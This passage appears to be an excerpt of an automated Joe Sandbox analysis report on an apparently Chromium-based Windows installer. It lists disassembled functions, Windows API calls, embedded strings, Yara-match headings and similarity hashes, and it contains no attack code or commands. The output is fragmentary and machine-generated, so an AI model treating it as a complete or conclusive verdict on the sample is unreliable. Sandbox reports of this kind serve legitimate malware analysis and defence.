                                                                                                                        • SetEnvironmentVariableW.KERNEL32(?,00000000,?,?,?,?,?,?,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 008F0293
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:396: assertion __pos < size() failed: string_view[] index out of bounds, xrefs: 008F0176
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008F016F, 008F023C
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008F0168, 008F0243
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\string_view:396: assertion __pos < size() failed: string_view[] index out of bounds
                                                                                                                        • API String ID: 1431749950-135494634
                                                                                                                        • Opcode ID: 3686a5ad33508cea450e2824b74e24053617c241f3ac280ea8a65520fd0d80b8
                                                                                                                        • Instruction ID: 861bcb014341e8691c5660329ebb136e6e03a64469f75a638ae23c29454d3aa1
                                                                                                                        • Opcode Fuzzy Hash: 3686a5ad33508cea450e2824b74e24053617c241f3ac280ea8a65520fd0d80b8
                                                                                                                        • Instruction Fuzzy Hash: 0751F171E0021D6FDF11ABB4CC45BBF7B64FF85324F088029EA45A7243D631AA55CBA2
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00834E50: _strlen.LIBCMT ref: 00834E60
                                                                                                                        • _strlen.LIBCMT ref: 00868EC7
                                                                                                                        Strings
                                                                                                                        • deflateEnd: , xrefs: 00869016
                                                                                                                        • http_body_gzip.cc, xrefs: 00869004
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00868F9D
                                                                                                                        • (%d), xrefs: 00868EA2
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: (%d)$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$deflateEnd: $http_body_gzip.cc
                                                                                                                        • API String ID: 4218353326-2874877394
                                                                                                                        • Opcode ID: 735e8439494f18939fe64418c81719253b7b9d05567f575de13ca0a3f37b5c8a
                                                                                                                        • Instruction ID: b504506e116284075791cd476faab6834946b30d1174d3233481ed25f2af67ed
                                                                                                                        • Opcode Fuzzy Hash: 735e8439494f18939fe64418c81719253b7b9d05567f575de13ca0a3f37b5c8a
                                                                                                                        • Instruction Fuzzy Hash: 62510971E002189BDF109B64DC41BEEB7B5FF99704F054269F549BB282EB316944CBA2
                                                                                                                        APIs
                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00000104), ref: 0089E7DD
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0089E845
                                                                                                                        • CreateAndOpenTemporaryFileInDir, xrefs: 0089E654
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0089E84C
                                                                                                                        • file_util_win.cc, xrefs: 0089E64F
                                                                                                                        Similarity
                                                                                                                        • API ID: LongNamePath
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$CreateAndOpenTemporaryFileInDir$file_util_win.cc
                                                                                                                        • API String ID: 82841172-2017746051
                                                                                                                        • Opcode ID: 035d85998eef2e3b39e06ab060ab0ebb1e2848d80d7ea12a112828dd63319d1a
                                                                                                                        • Instruction ID: a7d223fc271bae86622f7a1b43a125cf17565394a3275c299d8a3bacf7880933
                                                                                                                        • Opcode Fuzzy Hash: 035d85998eef2e3b39e06ab060ab0ebb1e2848d80d7ea12a112828dd63319d1a
                                                                                                                        • Instruction Fuzzy Hash: F951D071A04345ABDB11FB24C856ABF7BA5FFD5704F08492DF985D7282EB30AA058783
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00966AD4,?,?,00000001,00000000,00000000,?,008D51BD,00000001,?), ref: 008AC900
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00966AD4,00000000,?,?,?,?,?,?,?,00000001,00000000,00000000,?,008D51BD,00000001,?), ref: 008AC9B3
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008ACA38
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008AC9E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireInit_thread_headerRelease
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap
                                                                                                                        • API String ID: 1281622111-302938261
                                                                                                                        • Opcode ID: afa81497cc83a8034ce23d51751f134ea893b4d93157ef1f2b53a6e0e1f01235
                                                                                                                        • Instruction ID: 0c1f6609bb2aa08809a4baf936d3cbe3d3f7ba31cc384269179b87e92da98b6a
                                                                                                                        • Opcode Fuzzy Hash: afa81497cc83a8034ce23d51751f134ea893b4d93157ef1f2b53a6e0e1f01235
                                                                                                                        • Instruction Fuzzy Hash: A7512871E042299FDB10DFA8D882A6A77A1FF41714F184138E905F7681DB717D05DBA2
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$download-x32$download-x64
                                                                                                                        • API String ID: 4218353326-1121541715
                                                                                                                        • Opcode ID: 22e419b7e1577ae6d0b4e4da1001ade8f7bf57836b86ad5c2de70fd96c9d757e
                                                                                                                        • Instruction ID: d2cdcd079b6c1dc2d539ff1136ee4dd81d0f77ad89129d489718f22739f6e2cd
                                                                                                                        • Opcode Fuzzy Hash: 22e419b7e1577ae6d0b4e4da1001ade8f7bf57836b86ad5c2de70fd96c9d757e
                                                                                                                        • Instruction Fuzzy Hash: 954158B1E0521D5FCB20AEF4E896BAFB7A8FF40318F150439E901E7282E664590987D6
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileReplace
                                                                                                                        • String ID: ReplaceFileW$file_util_win.cc
                                                                                                                        • API String ID: 77091634-3250378775
                                                                                                                        • Opcode ID: 9178051a9fac6f5ffb2884befcaa123a452064a3fc1a80a96daf3b9af8547393
                                                                                                                        • Instruction ID: c3eda074c6e3f57887feb20f69e565e8df99a47ba9631e7b93a0bbaacd0898ae
                                                                                                                        • Opcode Fuzzy Hash: 9178051a9fac6f5ffb2884befcaa123a452064a3fc1a80a96daf3b9af8547393
                                                                                                                        • Instruction Fuzzy Hash: 1C41DAB1A007416FEB10EB38DC45B6B7B98FF95358F084629F899D7242FB30A94483D1
                                                                                                                        Strings
                                                                                                                        • code, xrefs: 0085A664
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0085A699
                                                                                                                        • lite_install_failed, xrefs: 0085A60C, 0085A63B
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0085A6A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$code$lite_install_failed
                                                                                                                        • API String ID: 0-4122915047
                                                                                                                        • Opcode ID: 60e8699d0eed3dadc253434fbfce7110570e199f38efbf9f89df767dd262bf97
                                                                                                                        • Instruction ID: 0c031cc1275596eb3dc0954769fa3fa954e7cb4439f0119fa7fa98e829a03156
                                                                                                                        • Opcode Fuzzy Hash: 60e8699d0eed3dadc253434fbfce7110570e199f38efbf9f89df767dd262bf97
                                                                                                                        • Instruction Fuzzy Hash: D721C0753046169B9B2C8E25C4E093677E5FEB174B31D4729EC06D3640E721FC9C9693
                                                                                                                        APIs
                                                                                                                        • QueryUnbiasedInterruptTime.KERNEL32(?,?,?,?,?,008404E0), ref: 0092E8F4
                                                                                                                        • __aulldiv.LIBCMT ref: 0092E915
                                                                                                                        • __aulldiv.LIBCMT ref: 0092E929
                                                                                                                        • __aullrem.LIBCMT ref: 0092E93F
                                                                                                                        Strings
                                                                                                                        • xOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQk, xrefs: 0092E920, 0092E926, 0092E937, 0092E93C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldiv$InterruptQueryTimeUnbiased__aullrem
                                                                                                                        • String ID: xOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQkyMTkJMjE5CTIxOQk
                                                                                                                        • API String ID: 493618052-83919110
                                                                                                                        • Opcode ID: e26fada44ee2cb61ff719ce6232d20c1246b4f3f44490d710abbcaf59a39dd9c
                                                                                                                        • Instruction ID: e90243e8a0ee827685defa4400f50873425374d95a6e4801f6fbf98c4fa7db86
                                                                                                                        • Opcode Fuzzy Hash: e26fada44ee2cb61ff719ce6232d20c1246b4f3f44490d710abbcaf59a39dd9c
                                                                                                                        • Instruction Fuzzy Hash: 64119A727003146FD714DF299C81A7BB6EDEBC8714B04892EF98AD7392E660AC408791
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008D2419
                                                                                                                        • LoadLibraryW.KERNEL32(bcryptprimitives.dll,008CCC96,00000010,?,?,00000063,?,0089E6F9,?,?,00000000), ref: 008D242F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 008D243F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressInit_thread_headerLibraryLoadProc
                                                                                                                        • String ID: ProcessPrng$bcryptprimitives.dll
                                                                                                                        • API String ID: 1459703600-2667675608
                                                                                                                        • Opcode ID: 0bbd43abcc0e9c81c30dedfa38bbc36517b06a50417e7c6a587f062d28c5abff
                                                                                                                        • Instruction ID: a99c1eb7145c7de0292acbb127dcc2d91696d2434922c59c37dfe5ade0633dd4
                                                                                                                        • Opcode Fuzzy Hash: 0bbd43abcc0e9c81c30dedfa38bbc36517b06a50417e7c6a587f062d28c5abff
                                                                                                                        • Instruction Fuzzy Hash: 4B117D3260434457D728AB7DEC55E663715FFE1B15B04026EFE05C3761DB354845A722
                                                                                                                        APIs
                                                                                                                        • FindResourceW.KERNEL32(00000000,?,?,-00000001,008446AD,00000000,?,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C5E
                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C6C
                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C7B
                                                                                                                        • LockResource.KERNEL32(00000000,?,008C46BD,SIGNATURE_DAT,SIGNATURE.DAT,00000000), ref: 008C4C86
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008C4CB9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds
                                                                                                                        • API String ID: 3473537107-2998926704
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(process_win.cc,000000FD,000000FE), ref: 0089C894
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentProcess
                                                                                                                        • String ID: exited with code $..\..\base\process\process_win.cc$Process $process_win.cc
                                                                                                                        • API String ID: 2050909247-4186332098
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 00848851
                                                                                                                        • GetLastError.KERNEL32 ref: 00848862
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,The elevated installer hangs and must be forcibly terminated.,00943746,00000001,EnsureProcessFinished,00000763,?), ref: 008488BF
                                                                                                                        Strings
                                                                                                                        • EnsureProcessFinished, xrefs: 00848882
                                                                                                                        • The elevated installer hangs and must be forcibly terminated., xrefs: 00848897
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastObjectProcessSingleTerminateWait
                                                                                                                        • String ID: EnsureProcessFinished$The elevated installer hangs and must be forcibly terminated.
                                                                                                                        • API String ID: 329558020-1814985891
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008BCD40: GetLastError.KERNEL32 ref: 008BCD7F
                                                                                                                          • Part of subcall function 008BCD40: SetLastError.KERNEL32(00000000), ref: 008BCD94
                                                                                                                        • GetLastError.KERNEL32 ref: 008BCCC9
                                                                                                                        Strings
                                                                                                                        • CreateWellKnownSid failed, xrefs: 008BCCFB
                                                                                                                        • IsUserAnAdminGroup, xrefs: 008BCCE6
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008BCD29
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 008BCD38
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds$CreateWellKnownSid failed$IsUserAnAdminGroup
                                                                                                                        • API String ID: 1452528299-2313459760
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0089C9A6
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0089C9E2
                                                                                                                        • WaitForSingleObject.KERNEL32(-00000002,00000000), ref: 0089C9EA
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0089CA30
                                                                                                                        • GetExitCodeProcess.KERNEL32(00000000,FFFFFFFF), ref: 0089CA3B
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Current$CodeExitObjectSingleUnothrow_t@std@@@Wait__ehfuncinfo$??2@
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1195251599-0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • GetTokenInfo, xrefs: 008BCF09
                                                                                                                        • GetTokenInformation failed, xrefs: 008BCF1E
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008BCF4B
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 008BCF63
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$GetTokenInfo$GetTokenInformation failed
                                                                                                                        • API String ID: 1452528299-3859318850
                                                                                                                        APIs
                                                                                                                        • InitOnceExecuteOnce.KERNEL32(00972A68,Function_000D0610,?,00000000), ref: 008F0662
                                                                                                                        • TlsGetValue.KERNEL32 ref: 008F0693
                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00972A74), ref: 008F06A5
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00972A74), ref: 008F06D5
                                                                                                                        • TlsAlloc.KERNEL32 ref: 008F0763
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLockOnce$AcquireAllocExecuteInitReleaseValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 655554649-0
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 0595CF82
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0595CF8F
                                                                                                                          • Part of subcall function 0595BE2E: __EH_prolog3_GS.LIBCMT ref: 0595BE35
                                                                                                                          • Part of subcall function 0595BE2E: std::_Lockit::_Lockit.LIBCPMT ref: 0595BE46
                                                                                                                          • Part of subcall function 0595BE2E: std::_Lockit::~_Lockit.LIBCPMT ref: 0595BE68
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0595CFE2
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0595D00C
                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0595D019
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2687776920-0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: GetProcessToken$OpenProcessToken fail
                                                                                                                        • API String ID: 1452528299-1201466178
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __freea
                                                                                                                        • String ID: a/p$am/pm
                                                                                                                        • API String ID: 240046367-3206640213
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,008AEDEA,?,008B6900,008B932E,?,?,?,008B932E), ref: 008AEEC0
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,008AEDEA,?,008B6900,008B932E,?,?,?,008B932E), ref: 008AEEDC
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,008AEDEA,?,008B6900,008B932E,?,?,?,008B932E), ref: 008AF01D
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 008AF118
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Release$Acquire
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at
                                                                                                                        • API String ID: 1021914862-4189810390
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008988E3, 008988FE, 00898919
